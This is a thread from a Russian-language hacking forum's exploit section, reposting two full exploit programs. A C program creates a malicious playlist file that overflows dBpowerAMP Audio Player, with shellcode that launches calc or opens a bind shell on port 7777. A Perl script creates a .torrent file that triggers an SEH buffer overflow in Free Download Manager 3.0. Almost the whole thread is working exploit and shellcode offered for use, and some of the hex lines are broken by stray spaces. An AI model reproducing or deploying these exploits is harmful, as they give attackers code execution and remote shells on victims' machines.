    &&&&& Microsoft Windows XP [version 5.1.2600] &&&&&
    &&&&& Microso© Copyright 1985-2001 Microsoft Corp. &&&&&
    &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    */
    #include
    #include
    #include
    #include
    #define OFFSET 257
    char header[]=
    "\x5b\x70\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0d\x4e\x75\x6d\x62"
    "\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31\x0d\x0d\x46"
    "\x69\x6c\x65\x31\x3d\x68\x74\x74\x70\x3a\x2f\x2f";
    // calc
    char scode1[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
    "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
    "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
    "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
    "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
    "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
    "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
    "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
    "\x4e\x46\x43\x36\x42\x50\x5a\x2f";
    // bind shell 7777
    char scode2[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
    "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
    "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
    "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
    "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
    "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
    "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
    "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
    "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
    "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
    "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
    "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
    "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
    "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
    "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
    "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
    "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
    "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
    "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
    "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
    "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
    "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
    "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
    "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
    "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
    "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
    "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
    "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
    "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
    "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
    "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
    "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
    "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
    "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
    "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
    "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
    "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
    "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
    "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
    "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
    "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
    "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
    "\x6f\x58\x56\x49\x6f\x78\x50\x61";
    int main(int argc,char *argv[]){
    FILE *openfile;
    unsigned char *buffer;
    unsigned int RET=0x7c85d568;
    unsigned int offset=0;
    int number=0;

    printf("################################################################\n");
    printf(" dBpowerAMP Audio Player local buffer overflow exploit\n");
    printf("\tCoded By SimO-s0fT\n");
    printf("e-mail : simo[at]exploiter-ma[dot]com\n");
    printf("################################################################\n");
    printf("USAGE : simo36.exe simo.pls\n");
    printf("[1] execute calc.exe\n");
    printf("[2] execute bindshell LPORT=7777\n");
    printf("################################################################\n");
    system("color 04");
    sleep(2000);
    printf("enter");
    scanf("%d",&number);
    if((openfile=fopen(argv[1],"wb"))==NULL){
    perror("cannot opening file xD");
    exit(0);
    }
    switch(number){
    case 1:
    buffer = (unsigned char *) malloc (OFFSET + sizeof(RET) + strlen(scode1));
    memset(buffer,0x90,OFFSET + sizeof(RET) + strlen(scode1));
    offset=OFFSET;
    memcpy(buffer+offset,&RET,sizeof(RET)-1);
    offset+=sizeof(RET);
    memcpy(buffer+offset,scode1,strlen(scode1));
    offset+=strlen(scode1);
    fputs(header,openfile);
    fputs(buffer,openfile);
    fclose(openfile);
    printf("created !!\nopenit with dBpowerAMP");
    break;

    case 2:
    buffer = (unsigned char *) malloc ( OFFSET + sizeof(RET) + strlen(scode2));
    memset(buffer,0x90, OFFSET + sizeof(RET) + strlen(scode2));
    offset=OFFSET;
    memcpy(buffer+offset,&RET,sizeof(RET));
    offset+=sizeof(RET);
    memcpy(buffer+offset,scode2,strlen(scode2));
    offset+=strlen(scode2);
    fputs(header,openfile);
    fputs(buffer,openfile);
    fclose(openfile);
    printf("created !!\n openit with dBpowerAMP");
    break;
    }
    free(buffer);
    return 0;
    }

     
    aka_kludgeДата: Понедельник, 16.02.2009, 09:33 | Сообщение # 11
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit

    04 февраля, 2009

    Цель: Free Download Manager 3.0 Build 844 и более ранние версии
    Воздействие: Выполнение произвольного кода

    Описание уязвимости:

    * Множественные уязвимости в Free Download Manager

    Код эксплоита:

    * Free-Download-Manager-expl.pl

    #!/usr/bin/perl
    #
    # Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
    # -----------------------------------------------------------
    # Exploit by SkD (skdrat@hotmail.com)
    #
    # Vendors URL =
    # [www.freedownloadmanager.org]
    # Download FDM 3.0 Build 844 =
    # [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
    # (Downloaded by over 1.6 million users!)
    #
    # This is another one of the more advanced exploitation methods
    # for buffer overflows using my method called "shell building".
    # It utilizes a SEH overflow and then a shellcode builder/assembler
    # "builds"/or "assembles" bytes that were deleted by transformation
    # of the buffer so that the shellcode will work without a flaw.
    # I have been able to do this because of my recent experiences with
    # UNICODE based overflows (heap & stack). This is a demonstration
    # of how you can obtain power with limitations to buffer.
    # Of course I could have used my shellhunting technique,
    # but this is a new method, and to demonstrate it in a world of
    # dying buffer overflows is important for me.
    #
    # Unfortunately I did not have time to make this a universal exploit
    # so it will only work on all NT systems EXCEPT Vista (due to randomized
    # heap, etc). But with a few modifications it can work (sure of it).
    # Read my notes & comments in the script for more info.
    #
    # Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
    #
    # Note: Author has no responsibility over the damage you do with this!

    use strict;
    use warnings;

    my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
    "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
    "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
    "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";
    my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".
    "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";

    # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
    my $shellcode =
    "\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".
    #Notice I added 0x01 byte before each 0x80=> byte.
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x3 4".
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" .
    "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
    "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".
    " \x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
    "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
    "\x 46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
    "\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".
    "\x4f \x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
    "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
    "\x41\x 30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".
    "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".
    "\x4e\x50 \x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".
    "\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
    "\x42\x50\x 42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".
    "\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".
    "\x42\x35\x4a \x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".
    "\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
    "\x4e\x36\x43\x 46\x42\x30\x5a";

    #This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
    #the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
    #You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
    #0x01 before each 0x80=> byte.
    my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
    ("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
    ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
    ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
    ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
    ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
    my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc).
    my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
    my $overflow1 = "\x41" x 10000;
    my $overflow2 = "\x41" x $len;
    my $sled = "\x41" x (350 - length($shellcode_builder));
    my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump wink
    my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

    open(my $torrent, "> s.torrent");
    print $torrent $tdata1.
    $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
    $tdata2;
    close $torrent;

     
    aka_kludgeДата: Среда, 27.05.2009, 08:48 | Сообщение # 12
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    cool
     
    Форум » взЛОм » В сеТИ » Эксплойты (Сюда будут выкладываться эксплойты)
    • Страница 1 из 1
    • 1
    Поиск:

    Профиль
    ИнформацияУправление
    Сегодня: 29, 29.03.2024, 18:31
    Вы используете: " v "
    ВаШ внешний IP: "35.170.64.185"
    У вас новых личных сообщений · Мой профиль | Выход




        Главная      
    ...
    На службе : дней

    18:31
    Обновить


    Пользователи
    aka_kludge
    qwerty
    LeadyTOR
    aka_Atlantis
    AdHErENt
    mAss
    Sissutr
    hiss
    DrBio
    tHick

    Поиск


    Copyright tHR - TeAM 2024 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, ... Яндекс.Метрика